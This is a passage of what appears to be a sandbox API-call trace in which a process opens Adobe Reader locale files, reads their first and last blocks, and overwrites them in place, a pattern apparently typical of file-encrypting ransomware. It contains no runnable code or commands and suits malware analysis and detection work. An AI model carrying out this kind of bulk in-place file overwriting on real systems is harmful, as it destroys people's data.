lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5200 [0072.656] WriteFile (in: hFile=0x1dc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.656] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0072.656] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.656] CloseHandle (hObject=0x1dc) returned 1 [0072.656] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Acroform.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\acroform.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0072.657] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0072.657] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6d200 [0072.657] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0072.657] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.658] ReleaseMutex (hMutex=0x168) returned 1 [0072.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.ESP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0072.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.ESP", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.ESP", lpUsedDefaultChar=0x0) returned 12 [0072.658] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0072.660] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6c200 [0072.660] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0072.664] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6c200 [0072.664] WriteFile (in: hFile=0x1dc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.664] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0072.665] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0072.665] CloseHandle (hObject=0x1dc) returned 1 [0072.665] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\EScript.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\escript.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0072.666] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0072.666] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xa600 [0072.666] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0072.666] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.667] ReleaseMutex (hMutex=0x168) returned 1 [0072.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.ESP", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0072.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.ESP", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.ESP", lpUsedDefaultChar=0x0) returned 11 [0072.667] ReadFile (in: hFile=0x1dc, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0073.701] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x9600 [0073.701] ReadFile (in: hFile=0x1dc, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0075.073] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x9600 [0075.073] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.073] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0075.074] WriteFile (in: hFile=0x1dc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.074] CloseHandle (hObject=0x1dc) returned 1 [0075.920] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\reflow.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\reflow.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0076.426] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.426] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1200 [0076.427] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.427] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.431] ReleaseMutex (hMutex=0x168) returned 1 [0076.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.ESP", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.ESP", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.ESP", lpUsedDefaultChar=0x0) returned 10 [0076.436] ReadFile (in: hFile=0x1e4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf2bc*=0x1200, lpOverlapped=0x0) returned 1 [0076.446] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0076.447] WriteFile (in: hFile=0x1e4, lpBuffer=0x2692be8*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2692be8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1788, lpOverlapped=0x0) returned 1 [0076.447] CloseHandle (hObject=0x1e4) returned 1 [0076.448] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Weblink.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\weblink.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0076.448] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.448] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6e00 [0076.448] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.448] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.449] ReleaseMutex (hMutex=0x168) returned 1 [0076.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.ESP", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.ESP", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.ESP", lpUsedDefaultChar=0x0) returned 11 [0076.449] ReadFile (in: hFile=0x1e4, lpBuffer=0x2692be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2692be8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.458] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5e00 [0076.458] ReadFile (in: hFile=0x1e4, lpBuffer=0x2692be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2692be8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.460] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5e00 [0076.460] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.461] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0076.461] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.461] CloseHandle (hObject=0x1e4) returned 1 [0076.462] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\DVA.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\dva.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0076.462] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.462] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4a00 [0076.462] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.463] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.463] ReleaseMutex (hMutex=0x168) returned 1 [0076.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.EUQ", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0076.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.EUQ", cchWideChar=7, lpMultiByteStr=0x1f7abdc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.EUQ", lpUsedDefaultChar=0x0) returned 7 [0076.463] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.468] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3a00 [0076.468] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.469] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3a00 [0076.469] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.469] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0076.470] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.470] CloseHandle (hObject=0x1e4) returned 1 [0076.470] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\RdLang32.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\rdlang32.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0076.471] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.471] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x14e000 [0076.471] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.471] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.471] ReleaseMutex (hMutex=0x168) returned 1 [0076.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.EUQ", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.EUQ", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.EUQ", lpUsedDefaultChar=0x0) returned 12 [0076.472] ReadFile (in: hFile=0x1e4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0076.474] ReadFile (in: hFile=0x1e4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.474] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x14d000 [0076.474] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.476] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x14d000 [0076.476] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.477] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0076.477] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0076.477] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.478] CloseHandle (hObject=0x1e4) returned 1 [0076.478] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Spelling.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\spelling.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0076.478] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.479] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2a00 [0076.479] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.479] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.479] ReleaseMutex (hMutex=0x168) returned 1 [0076.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.EUQ", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.EUQ", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.EUQ", lpUsedDefaultChar=0x0) returned 12 [0076.480] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.481] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1a00 [0076.481] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.483] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1a00 [0076.483] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.484] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0076.484] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.484] CloseHandle (hObject=0x1e4) returned 1 [0076.485] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Checkers.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\checkers.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0076.485] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.486] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1de00 [0076.486] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.486] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.486] ReleaseMutex (hMutex=0x168) returned 1 [0076.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.SUO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.SUO", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 